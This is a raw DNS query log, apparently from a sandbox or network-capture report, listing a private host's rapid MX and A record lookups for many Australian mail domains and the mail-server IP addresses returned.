                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.106281042 CET8.8.8.8192.168.2.30xa5f8No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.106281042 CET8.8.8.8192.168.2.30xa5f8No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.106281042 CET8.8.8.8192.168.2.30xa5f8No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.106281042 CET8.8.8.8192.168.2.30xa5f8No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.106281042 CET8.8.8.8192.168.2.30xa5f8No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.106281042 CET8.8.8.8192.168.2.30xa5f8No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.106281042 CET8.8.8.8192.168.2.30xa5f8No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.112903118 CET8.8.8.8192.168.2.30x9f0No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.112903118 CET8.8.8.8192.168.2.30x9f0No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.112903118 CET8.8.8.8192.168.2.30x9f0No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.154706001 CET8.8.8.8192.168.2.30x430No error (0)mta5.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.154706001 CET8.8.8.8192.168.2.30x430No error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.154706001 CET8.8.8.8192.168.2.30x430No error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.154706001 CET8.8.8.8192.168.2.30x430No error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.154706001 CET8.8.8.8192.168.2.30x430No error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.154706001 CET8.8.8.8192.168.2.30x430No error (0)mta5.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.154706001 CET8.8.8.8192.168.2.30x430No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.154706001 CET8.8.8.8192.168.2.30x430No error (0)mta5.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.434840918 CET8.8.8.8192.168.2.30x90c4No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.434840918 CET8.8.8.8192.168.2.30x90c4No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.434840918 CET8.8.8.8192.168.2.30x90c4No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.508120060 CET8.8.8.8192.168.2.30xf187No error (0)rawson.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.508120060 CET8.8.8.8192.168.2.30xf187No error (0)rawson.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:11.783061028 CET8.8.8.8192.168.2.30xe827No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:11.783061028 CET8.8.8.8192.168.2.30xe827No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:11.783061028 CET8.8.8.8192.168.2.30xe827No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:11.783061028 CET8.8.8.8192.168.2.30xe827No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:11.783061028 CET8.8.8.8192.168.2.30xe827No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:11.783061028 CET8.8.8.8192.168.2.30xe827No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:11.783061028 CET8.8.8.8192.168.2.30xe827No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:11.783061028 CET8.8.8.8192.168.2.30xe827No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:11.803179979 CET8.8.8.8192.168.2.30x5d3dNo error (0)au-smtp-inbound-2.mimecast.com103.13.69.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:11.803179979 CET8.8.8.8192.168.2.30x5d3dNo error (0)au-smtp-inbound-2.mimecast.com124.47.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:11.803179979 CET8.8.8.8192.168.2.30x5d3dNo error (0)au-smtp-inbound-2.mimecast.com103.13.69.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:11.803179979 CET8.8.8.8192.168.2.30x5d3dNo error (0)au-smtp-inbound-2.mimecast.com124.47.150.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.237078905 CET8.8.8.8192.168.2.30xb229No error (0)student.ecu.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.237078905 CET8.8.8.8192.168.2.30xb229No error (0)student.ecu.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.370204926 CET8.8.8.8192.168.2.30xf401No error (0)ncable.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.383697033 CET8.8.8.8192.168.2.30xd18cNo error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.383697033 CET8.8.8.8192.168.2.30xd18cNo error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.403915882 CET8.8.8.8192.168.2.30x13dcNo error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.420106888 CET8.8.8.8192.168.2.30x329eNo error (0)student-ecu-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.420106888 CET8.8.8.8192.168.2.30x329eNo error (0)student-ecu-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.497003078 CET8.8.8.8192.168.2.30x783bNo error (0)rigolismash.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.497003078 CET8.8.8.8192.168.2.30x783bNo error (0)rigolismash.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.603671074 CET8.8.8.8192.168.2.30xdf26No error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.619734049 CET8.8.8.8192.168.2.30x7722No error (0)adventureworld.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.671456099 CET8.8.8.8192.168.2.30x9741No error (0)webcentral.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.675170898 CET8.8.8.8192.168.2.30xd93bNo error (0)immi.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.675170898 CET8.8.8.8192.168.2.30xd93bNo error (0)immi.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.759138107 CET8.8.8.8192.168.2.30xe0dbNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.759138107 CET8.8.8.8192.168.2.30xe0dbNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.759138107 CET8.8.8.8192.168.2.30xe0dbNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.765372038 CET8.8.8.8192.168.2.30x312bNo error (0)adventureworld-com-au.mail.protection.outlook.com104.47.66.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.765372038 CET8.8.8.8192.168.2.30x312bNo error (0)adventureworld-com-au.mail.protection.outlook.com104.47.55.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.780220032 CET8.8.8.8192.168.2.30x91afNo error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.780220032 CET8.8.8.8192.168.2.30x91afNo error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.780220032 CET8.8.8.8192.168.2.30x91afNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.780220032 CET8.8.8.8192.168.2.30x91afNo error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.780220032 CET8.8.8.8192.168.2.30x91afNo error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.780220032 CET8.8.8.8192.168.2.30x91afNo error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.780220032 CET8.8.8.8192.168.2.30x91afNo error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.780220032 CET8.8.8.8192.168.2.30x91afNo error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.829821110 CET8.8.8.8192.168.2.30x877fNo error (0)webcentral-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.829821110 CET8.8.8.8192.168.2.30x877fNo error (0)webcentral-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.835200071 CET8.8.8.8192.168.2.30x854eNo error (0)hammer.websitemanagers.com.au59.100.172.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.913280010 CET8.8.8.8192.168.2.30x54bbNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.913280010 CET8.8.8.8192.168.2.30x54bbNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.913280010 CET8.8.8.8192.168.2.30x54bbNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.921133041 CET8.8.8.8192.168.2.30xe75cNo error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.921133041 CET8.8.8.8192.168.2.30xe75cNo error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.933712959 CET8.8.8.8192.168.2.30x70c1No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.933712959 CET8.8.8.8192.168.2.30x70c1No error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.933712959 CET8.8.8.8192.168.2.30x70c1No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.933712959 CET8.8.8.8192.168.2.30x70c1No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.933712959 CET8.8.8.8192.168.2.30x70c1No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.933712959 CET8.8.8.8192.168.2.30x70c1No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.933712959 CET8.8.8.8192.168.2.30x70c1No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.933712959 CET8.8.8.8192.168.2.30x70c1No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.982552052 CET8.8.8.8192.168.2.30x284aNo error (0)dibp-ibmail2.msng.telstra.com.au58.162.22.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.056056023 CET8.8.8.8192.168.2.30x4160No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.076142073 CET8.8.8.8192.168.2.30xcb3No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.129390001 CET8.8.8.8192.168.2.30xe4fbServer failure (2)veritel.com.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.183191061 CET8.8.8.8192.168.2.30x4d4bNo error (0)uqconnect.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.232681990 CET8.8.8.8192.168.2.30xb8No error (0)netc.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.253025055 CET8.8.8.8192.168.2.30x1711No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.266705990 CET8.8.8.8192.168.2.30x107Name error (3)akoqi.com.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.276906013 CET8.8.8.8192.168.2.30x686eNo error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.304047108 CET8.8.8.8192.168.2.30x6132No error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.304047108 CET8.8.8.8192.168.2.30x6132No error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.342325926 CET8.8.8.8192.168.2.30xfadcNo error (0)uqconnect-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.342325926 CET8.8.8.8192.168.2.30xfadcNo error (0)uqconnect-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.377556086 CET8.8.8.8192.168.2.30xada9No error (0)bigpond.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.385834932 CET8.8.8.8192.168.2.30x2f0eNo error (0)symbolix.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.385834932 CET8.8.8.8192.168.2.30x2f0eNo error (0)symbolix.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.385834932 CET8.8.8.8192.168.2.30x2f0eNo error (0)symbolix.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.385834932 CET8.8.8.8192.168.2.30x2f0eNo error (0)symbolix.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.385834932 CET8.8.8.8192.168.2.30x2f0eNo error (0)symbolix.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.391081095 CET8.8.8.8192.168.2.30xa88eNo error (0)mx.ncable.net.au203.208.88.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.402465105 CET8.8.8.8192.168.2.30xac1dNo error (0)extmail.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.402465105 CET8.8.8.8192.168.2.30xac1dNo error (0)extmail.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.407114029 CET8.8.8.8192.168.2.30x6959No error (0)aspmx.l.google.com142.250.153.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.486957073 CET8.8.8.8192.168.2.30xbd66No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.486957073 CET8.8.8.8192.168.2.30xbd66No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.486957073 CET8.8.8.8192.168.2.30xbd66No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.511046886 CET8.8.8.8192.168.2.30x4015No error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.511046886 CET8.8.8.8192.168.2.30x4015No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.511046886 CET8.8.8.8192.168.2.30x4015No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.511046886 CET8.8.8.8192.168.2.30x4015No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.511046886 CET8.8.8.8192.168.2.30x4015No error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.511046886 CET8.8.8.8192.168.2.30x4015No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.511046886 CET8.8.8.8192.168.2.30x4015No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.511046886 CET8.8.8.8192.168.2.30x4015No error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.741055965 CET8.8.8.8192.168.2.30x969No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.741055965 CET8.8.8.8192.168.2.30x969No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.760005951 CET8.8.8.8192.168.2.30x5a5cNo error (0)asav2.iinet.net.au27.32.32.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.768822908 CET8.8.8.8192.168.2.30xa88eNo error (0)mx.ncable.net.au203.208.88.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.803591967 CET8.8.8.8192.168.2.30x2eaeNo error (0)ains.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.903086901 CET8.8.8.8192.168.2.30x9046No error (0)jcu.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.903086901 CET8.8.8.8192.168.2.30x9046No error (0)jcu.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.923969030 CET8.8.8.8192.168.2.30x2403No error (0)mail.ains.net.au202.126.100.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.939270973 CET8.8.8.8192.168.2.30xca2dNo error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.939270973 CET8.8.8.8192.168.2.30xca2dNo error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.958760023 CET8.8.8.8192.168.2.30xd6a0No error (0)asav2.iinet.net.au27.32.32.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.964746952 CET8.8.8.8192.168.2.30xeb53No error (0)micromaintenance.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.964746952 CET8.8.8.8192.168.2.30xeb53No error (0)micromaintenance.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.964746952 CET8.8.8.8192.168.2.30xeb53No error (0)micromaintenance.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.003747940 CET8.8.8.8192.168.2.30xf38fNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.003747940 CET8.8.8.8192.168.2.30xf38fNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.003747940 CET8.8.8.8192.168.2.30xf38fNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.024390936 CET8.8.8.8192.168.2.30x8391No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.024390936 CET8.8.8.8192.168.2.30x8391No error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.024390936 CET8.8.8.8192.168.2.30x8391No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.024390936 CET8.8.8.8192.168.2.30x8391No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.024390936 CET8.8.8.8192.168.2.30x8391No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.024390936 CET8.8.8.8192.168.2.30x8391No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.024390936 CET8.8.8.8192.168.2.30x8391No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.024390936 CET8.8.8.8192.168.2.30x8391No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.151734114 CET8.8.8.8192.168.2.30x9f14No error (0)filter2.microm-1.mailguard.com.au3.104.195.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.151734114 CET8.8.8.8192.168.2.30x9f14No error (0)filter2.microm-1.mailguard.com.au20.92.133.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.151734114 CET8.8.8.8192.168.2.30x9f14No error (0)filter2.microm-1.mailguard.com.au20.92.133.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.151734114 CET8.8.8.8192.168.2.30x9f14No error (0)filter2.microm-1.mailguard.com.au13.238.252.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.151734114 CET8.8.8.8192.168.2.30x9f14No error (0)filter2.microm-1.mailguard.com.au52.63.166.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.151734114 CET8.8.8.8192.168.2.30x9f14No error (0)filter2.microm-1.mailguard.com.au3.105.81.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.151734114 CET8.8.8.8192.168.2.30x9f14No error (0)filter2.microm-1.mailguard.com.au54.79.63.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.151734114 CET8.8.8.8192.168.2.30x9f14No error (0)filter2.microm-1.mailguard.com.au20.70.88.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.151734114 CET8.8.8.8192.168.2.30x9f14No error (0)filter2.microm-1.mailguard.com.au20.92.134.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.151734114 CET8.8.8.8192.168.2.30x9f14No error (0)filter2.microm-1.mailguard.com.au52.147.56.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.151734114 CET8.8.8.8192.168.2.30x9f14No error (0)filter2.microm-1.mailguard.com.au13.70.186.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.151734114 CET8.8.8.8192.168.2.30x9f14No error (0)filter2.microm-1.mailguard.com.au20.190.127.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.151734114 CET8.8.8.8192.168.2.30x9f14No error (0)filter2.microm-1.mailguard.com.au52.147.60.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.151734114 CET8.8.8.8192.168.2.30x9f14No error (0)filter2.microm-1.mailguard.com.au54.66.10.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.151734114 CET8.8.8.8192.168.2.30x9f14No error (0)filter2.microm-1.mailguard.com.au13.236.218.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.185038090 CET8.8.8.8192.168.2.30x4cc1No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.185038090 CET8.8.8.8192.168.2.30x4cc1No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.185038090 CET8.8.8.8192.168.2.30x4cc1No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.204375029 CET8.8.8.8192.168.2.30x95d9No error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
